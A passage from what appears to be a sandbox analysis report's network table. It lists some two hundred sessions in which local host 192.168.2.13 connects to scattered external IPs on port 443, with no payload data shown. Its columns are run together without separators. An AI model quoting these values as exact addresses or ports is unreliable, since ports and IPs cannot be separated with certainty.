                                                  18776192.168.2.134274879.82.25.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18777192.168.2.1338466145.135.121.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18778192.168.2.1359974211.116.254.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18779192.168.2.135136831.147.106.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18780192.168.2.133536874.33.135.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18781192.168.2.1356204203.45.33.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18782192.168.2.133288291.82.9.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18783192.168.2.134141468.127.174.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18784192.168.2.134679476.177.91.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18785192.168.2.1348638184.145.164.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18786192.168.2.1339828173.1.197.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18787192.168.2.1351132195.194.13.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18788192.168.2.1354608203.223.203.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18789192.168.2.1353260135.111.244.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18790192.168.2.1338588149.19.238.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18791192.168.2.13581309.91.88.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18792192.168.2.1353336150.145.238.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18793192.168.2.1354186204.159.31.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18794192.168.2.133768234.233.166.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18795192.168.2.1359668133.171.233.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18796192.168.2.1341062175.67.171.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18797192.168.2.134570664.203.37.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18798192.168.2.13399502.130.43.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18799192.168.2.134841678.250.191.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18800192.168.2.1342654169.6.181.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18801192.168.2.1351334101.49.130.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18802192.168.2.135483874.35.33.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18803192.168.2.1345854156.125.222.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18804192.168.2.135632078.108.57.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18805192.168.2.133733839.16.241.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18806192.168.2.1353812119.137.167.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18807192.168.2.134180470.25.57.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18808192.168.2.134092482.150.68.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18809192.168.2.13597389.35.87.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18810192.168.2.1338704116.218.61.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18811192.168.2.135612271.161.98.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18812192.168.2.135804040.39.209.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18813192.168.2.136007672.160.194.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18814192.168.2.1336964159.47.85.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18815192.168.2.133379883.57.172.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18816192.168.2.1348510126.251.16.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18817192.168.2.1337880188.57.196.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18818192.168.2.134512892.78.157.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18819192.168.2.135192658.159.118.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18820192.168.2.1342624161.247.106.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18821192.168.2.1337662222.34.182.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18822192.168.2.134804449.188.35.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18823192.168.2.1358856203.211.212.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18824192.168.2.134394071.133.171.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18825192.168.2.1358502158.53.11.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18826192.168.2.1333916114.169.176.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18827192.168.2.1352058176.212.211.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18828192.168.2.1339864218.5.254.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18829192.168.2.134884241.67.15.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18830192.168.2.1351964138.162.160.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18831192.168.2.135429043.150.180.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18832192.168.2.1352676124.23.35.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18833192.168.2.1336016147.140.254.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18834192.168.2.135271286.49.85.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18835192.168.2.1357162135.52.14.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18836192.168.2.1360706213.184.54.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18837192.168.2.133378273.76.159.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18838192.168.2.1350420164.150.175.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18839192.168.2.1348458185.219.156.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18840192.168.2.133952882.34.100.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18841192.168.2.1335102189.23.209.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18842192.168.2.1340982134.93.198.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18843192.168.2.133843220.134.56.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18844192.168.2.1348750219.163.234.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18845192.168.2.1338052187.24.250.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18846192.168.2.1355456210.204.134.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18847192.168.2.134383291.83.122.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18848192.168.2.135066672.190.58.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18849192.168.2.1348036102.86.88.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18850192.168.2.133783018.229.177.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18851192.168.2.1337656160.228.228.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18852192.168.2.134829485.71.31.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18853192.168.2.1335072188.89.127.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18854192.168.2.1332914139.65.118.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18855192.168.2.1355144204.151.149.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18856192.168.2.1355686176.209.101.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18857192.168.2.133503634.168.65.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18858192.168.2.1340016155.147.46.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18859192.168.2.133409261.133.230.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18860192.168.2.1355628221.9.113.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18861192.168.2.1358162171.151.79.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18862192.168.2.1355674108.11.7.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18863192.168.2.1354360109.41.152.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18864192.168.2.1344338149.242.175.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18865192.168.2.134173445.109.189.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18866192.168.2.134031845.79.217.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18867192.168.2.133688045.11.186.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18868192.168.2.135668479.69.89.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18869192.168.2.133861645.147.53.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18870192.168.2.134647441.106.137.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18871192.168.2.1345976106.121.197.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18872192.168.2.1353574201.34.64.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18873192.168.2.1345510151.20.153.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18874192.168.2.1340514166.235.181.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18875192.168.2.135173266.202.237.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18876192.168.2.133445817.106.203.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18877192.168.2.133511685.162.213.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18878192.168.2.1345622145.34.0.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18879192.168.2.1343228189.239.159.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18880192.168.2.136022870.96.235.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18881192.168.2.1353058121.63.206.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18882192.168.2.133691812.86.47.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18883192.168.2.1345902116.69.202.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18884192.168.2.134513046.110.185.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18885192.168.2.13332268.170.94.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18886192.168.2.135826881.189.117.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18887192.168.2.1346206199.128.239.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18888192.168.2.1335840175.166.255.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18889192.168.2.1350994155.22.114.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18890192.168.2.1359834155.76.25.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18891192.168.2.1334086137.145.239.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18892192.168.2.1338742217.161.232.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18893192.168.2.1357092217.110.101.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18894192.168.2.1360068203.103.106.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18895192.168.2.1336780172.11.75.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18896192.168.2.134692675.28.132.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18897192.168.2.1339336181.94.9.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18898192.168.2.13336308.216.49.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18899192.168.2.1350666199.103.175.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18900192.168.2.135443651.177.74.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18901192.168.2.1356338186.104.87.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18902192.168.2.1348646101.168.24.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18903192.168.2.13590942.189.82.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18904192.168.2.135363619.223.168.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18905192.168.2.134061475.252.207.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18906192.168.2.1336288222.228.161.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18907192.168.2.1359604148.74.215.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18908192.168.2.1352362125.196.159.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18909192.168.2.1341056122.116.98.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18910192.168.2.1359820213.253.137.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18911192.168.2.134989446.71.243.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18912192.168.2.1346214171.198.91.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18913192.168.2.1333190164.142.33.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18914192.168.2.1333900150.58.220.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18915192.168.2.133771046.204.118.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18916192.168.2.133689847.224.168.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18917192.168.2.134853887.133.153.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18918192.168.2.1332860147.169.218.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18919192.168.2.1354144197.19.135.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18920192.168.2.1337170188.166.232.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18921192.168.2.1353346134.134.109.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18922192.168.2.1343434193.134.235.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18923192.168.2.135412214.219.78.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18924192.168.2.1341148150.33.159.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18925192.168.2.1343290106.169.88.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18926192.168.2.133706448.230.95.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18927192.168.2.134029099.64.12.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18928192.168.2.1357684223.8.205.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18929192.168.2.135586471.162.29.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18930192.168.2.1348874142.100.210.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18931192.168.2.135497640.153.55.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18932192.168.2.1336430198.130.185.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18933192.168.2.1340998184.23.127.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18934192.168.2.1357082143.155.79.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18935192.168.2.1337312195.212.242.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18936192.168.2.1336868216.38.132.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18937192.168.2.1357098121.224.203.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18938192.168.2.1338638105.165.124.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18939192.168.2.1343334132.142.66.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18940192.168.2.13370989.54.99.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18941192.168.2.133443671.139.117.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18942192.168.2.1354768219.9.22.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18943192.168.2.1333670174.59.127.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18944192.168.2.1357868205.99.236.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18945192.168.2.1345198186.145.9.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18946192.168.2.1337822122.167.172.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18947192.168.2.1341136121.45.221.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18948192.168.2.1340440202.81.163.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18949192.168.2.1360776113.135.33.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18950192.168.2.1347902213.149.210.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18951192.168.2.134622025.183.57.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18952192.168.2.1356336219.206.155.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18953192.168.2.1336066126.209.117.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18954192.168.2.1360200195.23.88.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18955192.168.2.1334742176.41.180.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18956192.168.2.1358476113.246.242.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18957192.168.2.1355548149.44.33.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18958192.168.2.134683641.26.152.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18959192.168.2.1354640136.233.129.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18960192.168.2.1351504155.132.212.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18961192.168.2.1356440202.128.151.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18962192.168.2.1338818143.247.33.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18963192.168.2.1342912202.93.186.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18964192.168.2.135893853.196.197.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18965192.168.2.133417260.114.174.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18966192.168.2.13514548.191.57.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18967192.168.2.1360520120.193.146.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18968192.168.2.1344404212.117.9.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18969192.168.2.134943095.90.175.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18970192.168.2.1354328192.195.252.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18971192.168.2.1356698126.52.11.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18972192.168.2.135732478.40.17.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18973192.168.2.133843863.25.25.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18974192.168.2.1350794172.2.228.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18975192.168.2.135040669.61.146.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18976192.168.2.1338614187.64.113.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18977192.168.2.133383624.240.61.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18978192.168.2.1336500142.196.125.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18979192.168.2.135134617.240.12.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18980192.168.2.1342254171.143.185.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18981192.168.2.1335190171.83.156.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18982192.168.2.134362831.213.247.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18983192.168.2.134021871.80.170.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18984192.168.2.133974041.185.86.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18985192.168.2.1348894141.31.192.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18986192.168.2.1346552158.21.173.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18987192.168.2.134894832.23.225.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18988192.168.2.1346754206.250.104.123443
